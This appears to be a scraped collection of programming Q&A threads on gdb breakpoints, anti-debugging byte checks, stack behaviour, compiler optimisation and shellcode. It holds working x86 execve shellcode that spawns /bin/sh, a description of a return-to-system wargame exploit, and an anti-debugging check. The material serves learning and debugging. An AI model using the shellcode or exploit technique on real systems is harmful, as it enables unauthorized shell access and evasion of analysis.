Anti-debugging: gdb does not write 0xcc byte for breakpoints. Any idea why? - c

I am learning some anti-debugging techniques on Linux and found a snippet of code for checking 0xcc byte in memory to detect the breakpoints in gdb. Here is that code:
if ((*(volatile unsigned *)((unsigned)foo + 3) & 0xff) == 0xcc)
{
printf("BREAKPOINT\n");
exit(1);
}
foo();
But it does not work. I even tried to set a breakpoint on foo() function and observe the contents in memory, but did not see any 0xcc byte written for breakpoint. Here is what I did:
(gdb) b foo
Breakpoint 1 at 0x804846a: file p4.c, line 8.
(gdb) x/x 0x804846a
0x804846a <foo+6>: 0xe02404c7
(gdb) x/16x 0x8048460
0x8048460 <frame_dummy+32>: 0x90c3c9d0 0x83e58955 0x04c718ec 0x0485e024
0x8048470 <foo+12>: 0xfefae808 0xc3c9ffff .....
As you can see, there seems to be no 0xcc byte written on the entry point of foo() function. Does anyone know what's going on or where I might be wrong? Thanks.

Second part is easily explained (as Flortify correctly stated):
GDB shows original memory contents, not the breakpoint "bytes". In default mode it actually even removes breakpoints when debugger suspends and re-inserts them before continuing. Users typically want to see their code, not strange modified instructions used for breakpoints.
With your C code you missed breakpoint for few bytes. GDB sets breakpoint after function prologue, because function prologue is not typically what gdb users want to see. So, if you put break to foo, actual breakpoint will be typically located few bytes after that (depends on prologue code itself that is function dependent as it may or might not have to save stack pointer, frame pointer and so on). But it is easy to check. I used this code:
#include <stdio.h>
int main()
{
int i,j;
unsigned char *p = (unsigned char*)main;
for (j=0; j<4; j++) {
printf("%p: ",p);
for (i=0; i<16; i++)
printf("%.2x ", *p++);
printf("\n");
}
return 0;
}
If we run this program by itself it prints:
0x40057d: 55 48 89 e5 48 83 ec 10 48 c7 45 f8 7d 05 40 00
0x40058d: c7 45 f4 00 00 00 00 eb 5a 48 8b 45 f8 48 89 c6
0x40059d: bf 84 06 40 00 b8 00 00 00 00 e8 b4 fe ff ff c7
0x4005ad: 45 f0 00 00 00 00 eb 27 48 8b 45 f8 48 8d 50 01
Now we run it in gdb (output re-formatted for SO).
(gdb) break main
Breakpoint 1 at 0x400585: file ../bp.c, line 6.
(gdb) info break
Num Type Disp Enb Address What
1 breakpoint keep y 0x0000000000400585 in main at ../bp.c:6
(gdb) disas/r main,+32
Dump of assembler code from 0x40057d to 0x40059d:
0x000000000040057d (main+0): 55 push %rbp
0x000000000040057e (main+1): 48 89 e5 mov %rsp,%rbp
0x0000000000400581 (main+4): 48 83 ec 10 sub $0x10,%rsp
0x0000000000400585 (main+8): 48 c7 45 f8 7d 05 40 00 movq $0x40057d,-0x8(%rbp)
0x000000000040058d (main+16): c7 45 f4 00 00 00 00 movl $0x0,-0xc(%rbp)
0x0000000000400594 (main+23): eb 5a jmp 0x4005f0
0x0000000000400596 (main+25): 48 8b 45 f8 mov -0x8(%rbp),%rax
0x000000000040059a (main+29): 48 89 c6 mov %rax,%rsi
End of assembler dump.
With this we verified, that program is printing correct bytes. But this also shows that breakpoint has been inserted at 0x400585 (that is after function prologue), not at first instruction of function.
If we now run program under gdb (with run) and then "continue" after breakpoint is hit, we get this output:
(gdb) cont
Continuing.
0x40057d: 55 48 89 e5 48 83 ec 10 cc c7 45 f8 7d 05 40 00
0x40058d: c7 45 f4 00 00 00 00 eb 5a 48 8b 45 f8 48 89 c6
0x40059d: bf 84 06 40 00 b8 00 00 00 00 e8 b4 fe ff ff c7
0x4005ad: 45 f0 00 00 00 00 eb 27 48 8b 45 f8 48 8d 50 01
This now shows 0xcc being printed for address 9 bytes into main.

If your hardware supports it, GDB may be using Hardware Breakpoints, which do not patch the code.
While I have not confirmed this via any official docs, this page indicates that
By default, gdb attempts to use hardware-assisted break-points.
Since you indicate expecting 0xCC bytes, I'm assuming you're running on x86 hardware, as the int3 opcode is 0xCC. x86 processors have a set of debug registers DR0-DR3, where you can program the address of data to cause a breakpoint exception. DR7 is a bitfield which controls the behavior of the breakpoints, and DR6 indicates the status.
The debug registers can only be read/written from Ring 0 (kernel mode). That means that the kernel manages these registers for you (via the ptrace API, I believe.)
However, for the sake of anti-debugging, all hope is not lost! On Windows, the GetThreadContext API allows you to get (a copy) of the CONTEXT for a (stopped) thread. This structure includes the contents of the DRx registers. This question is about how to implement the same on Linux.

This may also be a white lie that GDB is telling you... there may be a breakpoint there in RAM but GDB has noted what was there beforehand (so it can restore it later) and is showing you that, instead of the true contents of RAM.
Of course, it could also be using Hardware Breakpoints, which is a facility available on some processors. Setting h/w breakpoints is done by telling the processor the address it should watch out for (and trigger a breakpoint interrupt if it gets hit by the program counter while executing code).

Related

Understanding array declaration in C

I'm trying to understand how the C Standard explains that the declaration can cause an error. Consider the following pretty simple code:
int main()
{
char test[1024 * 1024 * 1024];
test[0] = 0;
return 0;
}
Demo
This segfaluts. But the following code does not:
int main()
{
char test[1024 * 1024 * 1024];
return 0;
}
Demo
But when I compiled it on my machine the latest one segfaulted too. The main function looks as
00000000000008c6 <main>:
8c6: 55 push %rbp
8c7: 48 89 e5 mov %rsp,%rbp
8ca: 48 81 ec 20 00 00 40 sub $0x40000020,%rsp
8d1: 89 bd ec ff ff bf mov %edi,-0x40000014(%rbp) // <---HERE
8d7: 48 89 b5 e0 ff ff bf mov %rsi,-0x40000020(%rbp)
8de: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
8e5: 00 00
8e7: 48 89 45 f8 mov %rax,-0x8(%rbp)
8eb: 31 c0 xor %eax,%eax
8ed: b8 00 00 00 00 mov $0x0,%eax
8f2: 48 8b 55 f8 mov -0x8(%rbp),%rdx
8f6: 64 48 33 14 25 28 00 xor %fs:0x28,%rdx
8fd: 00 00
8ff: 74 05 je 906 <main+0x40>
901: e8 1a fe ff ff callq 720 <__stack_chk_fail#plt>
906: c9 leaveq
907: c3 retq
908: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1)
90f: 00
As far as I understood the segfault occurred when trying to mov %edi,-0x40000014(%rbp).
I tried to find the exaplanation in the N1570, Section 6.7.9 Initialization, but it does not seem to be the relevant one.
So how does the Standard explains this behavior?
The result is implementation-dependent
I can think of several reasons of why the behaviour should differ
compiler seeing that variable isn't used, no possible side-effect, and optimizing it away (even without optimization levels)
stack resizing on request. Since there are no writes to this variable yet, why resizing the stack now?
compilers don't have to use the stack for auto memory. Compiler can allocate memory using malloc, and free it on exit. Using heap would allow to allocate 1Gb without issues
stack size set at 1Gb :)

Does the main function of a C program ever reclaim the stack?

I am working through the OverTheWire wargames and one of my exploits overwrites the return address of main with the address of system. I have then used the fact that at the point main returns, esp is still pointing at one of my local variables and hence I can fill it with the command I want system to run (e.g. sh;#).
My confusion comes from that I thought functions in C reclaim the stack before returning and hence at the point the return address is called the stack pointer would be pointing at the return address rather than at the local variables. However, my exploit works so it seems that my stack pointer is pointing at the local variables when the return address is called.
The main thing I have noticed about this particular challenge compared to others is that it calls exit(0) at the end, instead of just ending, so the assembly doesn't end with leave, which may be the reason for this behaviour.
I haven't included the actual code since it's quite long and I was hoping there was a general explanation for what I am seeing, but please let me know if the assembly would be useful.
#include <stdio.h>
int main ( void )
{
printf("hello\n");
return(0);
}
the interesting relevant parts.
0000000000400430 <main>:
400430: 48 83 ec 08 sub $0x8,%rsp
400434: bf d4 05 40 00 mov $0x4005d4,%edi
400439: e8 c2 ff ff ff callq 400400 <puts#plt>
40043e: 31 c0 xor %eax,%eax
400440: 48 83 c4 08 add $0x8,%rsp
400444: c3 retq
400445: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
40044c: 00 00 00
40044f: 90 nop
0000000000400450 <_start>:
400450: 31 ed xor %ebp,%ebp
400452: 49 89 d1 mov %rdx,%r9
400455: 5e pop %rsi
400456: 48 89 e2 mov %rsp,%rdx
400459: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp
40045d: 50 push %rax
40045e: 54 push %rsp
40045f: 49 c7 c0 c0 05 40 00 mov $0x4005c0,%r8
400466: 48 c7 c1 50 05 40 00 mov $0x400550,%rcx
40046d: 48 c7 c7 30 04 40 00 mov $0x400430,%rdi
400474: e8 97 ff ff ff callq 400410 <__libc_start_main#plt>
400479: f4 hlt
40047a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1)
For the most part there is nothing special about main nor printf, etc these are just functions that conform to the calling convention. As re-asked SO questions will show sometimes the compiler will add extra stack or other calls when it sees a main() that it doesnt otherwise. but still it is a function that needs to conform to the calling convention. As seen in this case where the stack pointer is put back where it was found.
Before an operating system (Linux, Windows, MacOS, etc) can even think about running a program it needs to allocate some space for that program and tag that memory for that program in some way depending on the features of the processor and the OS, etc. Then you load the program from whatever media, and launch it at the binary file specified and/or well known entry point. A clean exit of the program will cause the operating system to free that memory, which the .text, .data, .bss and stack are the trivial/obvious ones that just go away as their memory just goes away. Other items that may have been allocated and associated with this program, open files, runtime allocated (not stack) memory, etc can/should also be freed, depends on the design of the os and/or the C library as to how that happens.
In the above case we see the bootstrap calls main and main returns then hlt is hit which this is an application not kernel code so that should cause a trap that causes the OS to clean up. An explicit exit() should be no different than a printf() or puts() or fopen() or any other function that ultimately makes one or more syscalls to the operating system. All that you can possibly find for these types of operating systems (Linux, Windows, MacOS) is the syscall. The release of memory happens outside the program as the program does not have control over it, would be a chicken and egg problem, program frees mmu tables that is using to free mmu tables...
compile and disassemble the object for main rather than the whole program
0000000000000000 <main>:
0: 48 83 ec 08 sub $0x8,%rsp
4: bf 00 00 00 00 mov $0x0,%edi
9: e8 00 00 00 00 callq e <main+0xe>
e: 31 c0 xor %eax,%eax
10: 48 83 c4 08 add $0x8,%rsp
14: c3 retq
no surprise there same as before, all we needed to see to understand that the stack was cleaned up before return. and that main is not special:
#include <stdio.h>
int notmain ( void )
{
printf("hello\n");
return(0);
}
0000000000000000 <notmain>:
0: 48 83 ec 08 sub $0x8,%rsp
4: bf 00 00 00 00 mov $0x0,%edi
9: e8 00 00 00 00 callq e <notmain+0xe>
e: 31 c0 xor %eax,%eax
10: 48 83 c4 08 add $0x8,%rsp
14: c3 retq
Now if you are asking if there is an exit() within main then sure it wont hit the return point in main so the stack pointer is offset by whatever amount. but if main calls some function and that function calls some function then that function calls exit() then the stack pointer is left at the stack frame point of function number two plus whatever the call (this is an x86) plus the exit() stack frame adds to it. You cannot simply assume that when exit() is called, if it is called, what the stack pointer is pointing at. You would have to examine the disassembly around that call to exit() plus the exit() code and anything it calls, to figure this out.

gdb breakpoint in shared library not working

So, I have the following c program:
#include <stdio.h>
#include <string.h>
int main(){
char arr[20];
//this is line 6
strcpy(arr,"Hello, world!\n");
printf(arr);
}
I compiled it using the following command:
gcc -g t2.c -o a2.out
After that I loaded it in gdb and tried setting breakpoints at line 6, at the strcpy function and at line 8. Sure enough, when setting the breakpoint at strcpy I got the following message : "Make breakpoint pending on future shared library load? (y or [n])". I answered "y" and got "Breakpoint 2 (strcpy) pending.".
After answering yes, and running through the program, Breakpoint 2 is never resolved, and the debugger jumps straight to Breakpoint 3 at printf.
I am using Intel syntax in my debugger. Other than that no custom settings. Can anyone tell why the Breakpoint at strcpy is never resolved?
Compilers such as gcc are deeply familiar with the semantics of string functions such as strcpy.
On x86-64 with your example, gcc 9 is generating inline assembly rather than a strcpy call even at
-O0. The breakpoint should work for most other functions.
x86-64 disassembly generated with gcc-9 (no strcpy call):
0000000000000000 <main>:
0: 48 83 ec 28 sub rsp,0x28
4: 48 b8 48 65 6c 6c 6f 2c 20 77 movabs rax,0x77202c6f6c6c6548
e: bf 01 00 00 00 mov edi,0x1
13: 48 89 04 24 mov QWORD PTR [rsp],rax
17: b8 21 0a 00 00 mov eax,0xa21
1c: 48 89 e6 mov rsi,rsp
1f: 66 89 44 24 0c mov WORD PTR [rsp+0xc],ax
24: 31 c0 xor eax,eax
26: c7 44 24 08 6f 72 6c 64 mov DWORD PTR [rsp+0x8],0x646c726f
2e: c6 44 24 0e 00 mov BYTE PTR [rsp+0xe],0x0
33: e8 00 00 00 00 call 38 <main+0x38> 34: R_X86_64_PLT32 __printf_chk-0x4
38: 31 c0 xor eax,eax
3a: 48 83 c4 28 add rsp,0x28
3e: c3 ret

compiler over-optimization causing data run time and debugging inconsistency

I have the following code:
struct cre_eqEntry *
cre_eventGet(struct cre_eqObj *eq_obj)
{
struct cre_eqEntry *eqe = cre_queueTailNode(&eq_obj->q);
Memcpy(&tmpEqo, eq_obj, sizeof(struct cre_eqObj));
volatile u32 ddd = 0;
ddd = ((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt;
CPUMemFenceReadWrite();
if (!ddd) {
tmp = eq_obj->q.tail;
assert(0);
return NULL;
}
}
It is a piece of kernel code. When I ran it, it fails at assert(0). So apparently ddd should be 0. But when I used GDB to debug the core dump and printed out '((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt', surprisingly, the value is not 0.
So I start suspecting it is the problem of compiler over-optimization. Here's the disassembly code:
00000000000047ec <cre_eventGet>:
47ec: 55 push %rbp
47ed: 48 89 fe mov %rdi,%rsi
47f0: ba 80 00 00 00 mov $0x80,%edx
47f5: 53 push %rbx
47f6: 48 89 fb mov %rdi,%rbx
47f9: 48 83 ec 18 sub $0x18,%rsp
47fd: 0f b7 6f 24 movzwl 0x24(%rdi),%ebp
4801: 0f b7 47 28 movzwl 0x28(%rdi),%eax
4805: 0f af e8 imul %eax,%ebp
4808: 48 63 ed movslq %ebp,%rbp
480b: 48 03 6f 18 add 0x18(%rdi),%rbp
480f: 48 8d 3d 00 00 00 00 lea 0x0(%rip),%rdi # 4816 <cre_eventGet+0x2a>
4816: e8 00 00 00 00 callq 481b <cre_eventGet+0x2f>
481b: 0f b7 43 28 movzwl 0x28(%rbx),%eax
481f: 48 8b 53 18 mov 0x18(%rbx),%rdx
4823: c7 44 24 0c 00 00 00 movl $0x0,0xc(%rsp)
482a: 00
482b: c1 e0 02 shl $0x2,%eax
482e: 48 98 cltq
4830: 8b 04 02 mov (%rdx,%rax,1),%eax
4833: 89 44 24 0c mov %eax,0xc(%rsp)
4837: 0f ae f0 mfence
483a: 8b 44 24 0c mov 0xc(%rsp),%eax
483e: 85 c0 test %eax,%eax
4840: 74 14 je 4856 <cre_eventGet+0x6a>
As far as I can see, the assembly code does the same thing as the C code.
So now I ran out of ideas what is causing the problem of inconsistency of 'ddd'.
Please kindly give me some hints!
ddd = ((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt;
Simplify your code. Perform address/boundary checks/validation. Your problem is likely that you are de-referencing some random, uninitialized, address within your process/thread's address space.
ddd = ((struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail))->evt; probably violates the strict aliasing rule (can't say 100% for sure without seeing the whole code).
If using gcc/clang, compile with -fno-strict-aliasing unless you want to rewrite your code to comply with the standard.
To do the latter, memcpy((u32 *)&ddd, &(struct cre_eqEntry *)(eq_obj->q.dma_mem.virtaddr + 4 * eq_obj->q.tail)->evt, sizeof ddd); but I guess your codebase may have similar violations in many places, so as a first step, using the compiler flag would be a way to see if this really is the problem.
The magic number 4 is suspicious too, review your code to check if this really is the correct offset and also check that it is not out of bounds of allocated memory.

shellcode executes /bin/sh but not ./abcde

I am trying to run some shellcode on a server where I dont have access to the shell, but I have access to my own executable bash script.
My shellcode looks like this:
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
When I run it locally, I spawn a shell with the code. I can also run other commands such as /bin/ls... However, when I try to change /bin/sh in favor of ./abcde it wont run my executable.
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
What am I doing wrong? I am on a x86-32 machine..
EDIT:
To make it more clear, this is the scenario:
unsigned char code[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff/bin/sh";
unsigned char code1[] = "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x88\x43\x07\x8d\x4b\x08\x89\x43"
"\x0c\x89\xc2\xb0\x0b\xcd\x80\xe8\xe6\xff\xff\xff./abcde";
int main(void){
void (*f)(void);
f = (void (*)(void))code; //works
f = (void (*)(void))code1; //Does NOT work
f();
}
Your program is not very portable as you include ia32 instructions in your strings. With some help from gdb it was easier to read:
(gdb) disassemble/r code,code1
Dump of assembler code from 0x804a040 to 0x804a080:
0x0804a040 <code+0>: eb 15 jmp 0x804a057 <code+23>
0x0804a042 <code+2>: 5b pop %ebx
0x0804a043 <code+3>: 31 c0 xor %eax,%eax
0x0804a045 <code+5>: 89 5b 08 mov %ebx,0x8(%ebx)
0x0804a048 <code+8>: 88 43 07 mov %al,0x7(%ebx)
0x0804a04b <code+11>: 8d 4b 08 lea 0x8(%ebx),%ecx
0x0804a04e <code+14>: 89 43 0c mov %eax,0xc(%ebx)
0x0804a051 <code+17>: 89 c2 mov %eax,%edx
0x0804a053 <code+19>: b0 0b mov $0xb,%al
0x0804a055 <code+21>: cd 80 int $0x80
0x0804a057 <code+23>: e8 e6 ff ff ff call 0x804a042 <code+2>
0x0804a05c <code+28>: 2f das
0x0804a05d <code+29>: 62 69 6e bound %ebp,0x6e(%ecx)
0x0804a060 <code+32>: 2f das
0x0804a061 <code+33>: 73 68 jae 0x804a0cb
0x0804a063 <code+35>: 00 00 add %al,(%eax)
0x0804a065: 00 00 add %al,(%eax)
0x0804a067: 00 00 add %al,(%eax)
0x0804a069: 00 00 add %al,(%eax)
0x0804a06b: 00 00 add %al,(%eax)
0x0804a06d: 00 00 add %al,(%eax)
0x0804a06f: 00 00 add %al,(%eax)
0x0804a071: 00 00 add %al,(%eax)
0x0804a073: 00 00 add %al,(%eax)
0x0804a075: 00 00 add %al,(%eax)
0x0804a077: 00 00 add %al,(%eax)
0x0804a079: 00 00 add %al,(%eax)
0x0804a07b: 00 00 add %al,(%eax)
0x0804a07d: 00 00 add %al,(%eax)
0x0804a07f: 00 eb add %ch,%bl
however a helpful compiler puts the code in a variable segment which will cause a segmentation fault when the processor jumps to the "string" adn tries to execute from it.
I think this is a similar question:
sys_execve system call from Assembly
A careful reading of the question reveals what is actually going on. Indeed the compiler will happily bork you by placing this in a variable region; however the OS platform targeted probably doesn't have NX enabled (enabling NX on arbitrary 32 bit process was a recipe for disaster for a long time as GCC extensions required the stack to be executable).
The actual problem is you don't have execute access to bash. Your ./abcde is a bash script by your own admission, so the loader interprets #!/bin/bash, goes to open /bin/bash and discovers you don't have x permissions and barfs. exec() returns -Esomething with unpredictable results when you run off the end of the shellcode.

Resources